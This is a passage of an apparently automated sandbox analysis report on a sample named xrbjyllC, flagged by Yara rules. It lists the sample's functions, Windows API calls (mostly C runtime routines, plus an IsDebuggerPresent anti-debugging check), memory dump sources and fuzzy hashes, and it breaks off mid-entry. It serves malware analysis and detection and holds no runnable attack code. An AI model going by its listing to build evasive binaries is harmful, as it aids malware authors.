                                                                                              Function 2DB85474 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,2DB869F5), ref: 2DB86A7F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: d4e8423abd7af99878e21432f0448bac80755169ddcfc032772ba17280c464d8
                                                                                              • Instruction ID: aaeeb44426d379cac35d452f13dd32e5de5ec1010f81ace27005c3d469ad7243
                                                                                              • Opcode Fuzzy Hash: d4e8423abd7af99878e21432f0448bac80755169ddcfc032772ba17280c464d8
                                                                                              • Instruction Fuzzy Hash: E41103B1800289CFCB10DF9AD585BDEBBF4EB48320F208469E959B7250D774A944CFA5
                                                                                              Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                              • SysAllocString.OLEAUT32 ref: 00401898
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocString_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 959018026-0
                                                                                              • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                              • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                              • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                              • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                              Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 10892065-0
                                                                                              • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                              • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                              • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                              • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                              Function 27F695C8 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1884960911.0000000027F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 27F60000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_27f60000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: d6d2b72d027184d57fe5ea84d5cafbe2b8dcab34fa9e806ff3c81e0203d2baf3
                                                                                              • Instruction ID: 32d5f1186475f80aef57cdc62db2554d84c8a47be1171550637cdf9bf62723cf
                                                                                              • Opcode Fuzzy Hash: d6d2b72d027184d57fe5ea84d5cafbe2b8dcab34fa9e806ff3c81e0203d2baf3
                                                                                              • Instruction Fuzzy Hash: 8D1155B19002488FDB24DFAAC4447DEFBF4EB88320F208829D459A7250CA39A940CFA4
                                                                                              Function 27DAD5E8 Relevance: .1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1884420939.0000000027DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 27DAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_27dad000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 43b1a625fd263c55856cd54913e501a6dbc4ac60af8517a866c8400e17b7149e
                                                                                              • Instruction ID: 54c112668bd4b7f4a11a9df85c7f5ee06adfda37f6e053513a052d7d5eebd319
                                                                                              • Opcode Fuzzy Hash: 43b1a625fd263c55856cd54913e501a6dbc4ac60af8517a866c8400e17b7149e
                                                                                              • Instruction Fuzzy Hash: 5F2100B1500608DFCB01DF14DAC0F0AFFA9FB98314F2885ADE90C0B25AC736D456CAA1
                                                                                              Function 27DBD030 Relevance: .1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1884501187.0000000027DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 27DBD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_27dbd000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b190a70142a888835ef77e7ab74389dd71790d07ec08161a3f987848678b375d
                                                                                              • Instruction ID: 6e793ddd64640bdd53ce78319f9d5232f44a196b7bd32f8d0b24899da3b7f700
                                                                                              • Opcode Fuzzy Hash: b190a70142a888835ef77e7ab74389dd71790d07ec08161a3f987848678b375d
                                                                                              • Instruction Fuzzy Hash: 9C2101B1604204DFCB20DF15DAC0F16FBA5EB84314F20C66DE94A5B256C33AD847CB62
                                                                                              Function 27DAD5E3 Relevance: .1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1884420939.0000000027DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 27DAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_27dad000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
                                                                                              • Instruction ID: a98a7582c2433c9c328516b96808ed672c9c7021db9e55e944bd666395837b6e
                                                                                              • Opcode Fuzzy Hash: db79b5eb69be54bde6d22b58705b80061de706f1e28455fb2d9027648eeca995
                                                                                              • Instruction Fuzzy Hash: 64119D76504644CFCB02CF10D9C4B06BF61FB94214F2885A9D9090A25AC336D55ACBA1
                                                                                              Function 27DBD02B Relevance: .1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1884501187.0000000027DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 27DBD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_27dbd000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 021c8d7180bca40b1b4a0da321e6e5f783d7625571517dbbd39f1422581fcb41
                                                                                              • Instruction ID: 3845b217b4515694663a33cbd01b666bc6298620f7a7d2ef8c8e3194bd8f72ac
                                                                                              • Opcode Fuzzy Hash: 021c8d7180bca40b1b4a0da321e6e5f783d7625571517dbbd39f1422581fcb41
                                                                                              • Instruction Fuzzy Hash: B6118B75504284DFDB11CF14D5C4B15FBA1FB84314F24C6AEDC4A4B656C33AD44ACB62
                                                                                              Function 27DAD005 Relevance: .0, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1884420939.0000000027DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 27DAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_27dad000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ebd5963d2dbea0553f357632ef604e37fdd14bdbdcf94b4d5c5d89c7b57b8afe
                                                                                              • Instruction ID: 666303be060f9a7da177805bc059fd5950fdb99fd330285d05a1b20561edb690
                                                                                              • Opcode Fuzzy Hash: ebd5963d2dbea0553f357632ef604e37fdd14bdbdcf94b4d5c5d89c7b57b8afe
                                                                                              • Instruction Fuzzy Hash: AB014C7140D3C09FD7024B268C94752BFB8EF53224F1985DBE9889F1A7C6695C49CBB2
                                                                                              Function 27DAD01D Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1884420939.0000000027DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 27DAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_27dad000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 33525c4e6d925ab2181681711c1b44f6b433a4fd450f06f4faa8ef168f09fe3d
                                                                                              • Instruction ID: 43dad9e0fb041da2589ac4ae41cacedb6b30055ea7c6fe5fb0381f3caad78222
                                                                                              • Opcode Fuzzy Hash: 33525c4e6d925ab2181681711c1b44f6b433a4fd450f06f4faa8ef168f09fe3d
                                                                                              • Instruction Fuzzy Hash: B001F271008340DAE3108B26C984B57FFDCFF41324F18C53EED882A28ACA799841CAB5

                                                                                              Non-executed Functions

                                                                                              Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                              • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.1859312320.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.1859312320.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 2579439406-0
                                                                                              • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                              • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                              • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                              • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                              Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.1859312320.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.1859312320.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Heap$FreeProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3859560861-0
                                                                                              • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                              • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                              • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                              • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                              Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.1859312320.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.1859312320.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                              • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                              • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                              • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                              Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                              • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,27DC18F8), ref: 004170C5
                                                                                              • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                              • _malloc.LIBCMT ref: 0041718A
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                              • _malloc.LIBCMT ref: 0041724C
                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                              • __freea.LIBCMT ref: 004172A4
                                                                                              • __freea.LIBCMT ref: 004172AD
                                                                                              • ___ansicp.LIBCMT ref: 004172DE
                                                                                              • ___convertcp.LIBCMT ref: 00417309
                                                                                              • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                              • _malloc.LIBCMT ref: 00417362
                                                                                              • _memset.LIBCMT ref: 00417384
                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                              • ___convertcp.LIBCMT ref: 004173BA
                                                                                              • __freea.LIBCMT ref: 004173CF
                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3809854901-0
                                                                                              • Opcode ID: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                              • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                              • Opcode Fuzzy Hash: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                              • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                              Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 004057DE
                                                                                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                              • _malloc.LIBCMT ref: 00405842
                                                                                              • _malloc.LIBCMT ref: 00405906
                                                                                              • _malloc.LIBCMT ref: 00405930
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _malloc$AllocateHeap
                                                                                              • String ID: 1.2.3
                                                                                              • API String ID: 680241177-2310465506
                                                                                              • Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                              • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                              • Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                              • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                              Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 3886058894-0
                                                                                              • Opcode ID: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                              • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                              • Opcode Fuzzy Hash: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                              • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                              Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EntryPoint.XRBJYLLC(80070057), ref: 004017EE
                                                                                                • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
                                                                                                • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                              • EntryPoint.XRBJYLLC(80070057), ref: 00401800
                                                                                              • EntryPoint.XRBJYLLC(80070057), ref: 00401813
                                                                                              • __recalloc.LIBCMT ref: 00401828
                                                                                              • EntryPoint.XRBJYLLC(8007000E), ref: 00401839
                                                                                              • EntryPoint.XRBJYLLC(8007000E), ref: 00401853
                                                                                              • _calloc.LIBCMT ref: 00401861
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                              • String ID:
                                                                                              • API String ID: 1721462702-0
                                                                                              • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                              • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                              • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                              • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                              Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 00414744
                                                                                                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                              • __getptd.LIBCMT ref: 0041475B
                                                                                              • __amsg_exit.LIBCMT ref: 00414769
                                                                                              • __lock.LIBCMT ref: 00414779
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                              • String ID: @.B
                                                                                              • API String ID: 3521780317-470711618
                                                                                              • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                              • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                              • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                              • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                              Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __lock_file.LIBCMT ref: 0040C6C8
                                                                                              • __fileno.LIBCMT ref: 0040C6D6
                                                                                              • __fileno.LIBCMT ref: 0040C6E2
                                                                                              • __fileno.LIBCMT ref: 0040C6EE
                                                                                              • __fileno.LIBCMT ref: 0040C6FE
                                                                                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 2805327698-0
                                                                                              • Opcode ID: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
                                                                                              • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                              • Opcode Fuzzy Hash: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
                                                                                              • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                              Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 00413FD8
                                                                                                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                              • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                              • __lock.LIBCMT ref: 00414008
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                              • InterlockedIncrement.KERNEL32(27DC1698), ref: 00414050
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                              • String ID:
                                                                                              • API String ID: 4271482742-0
                                                                                              • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                              • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
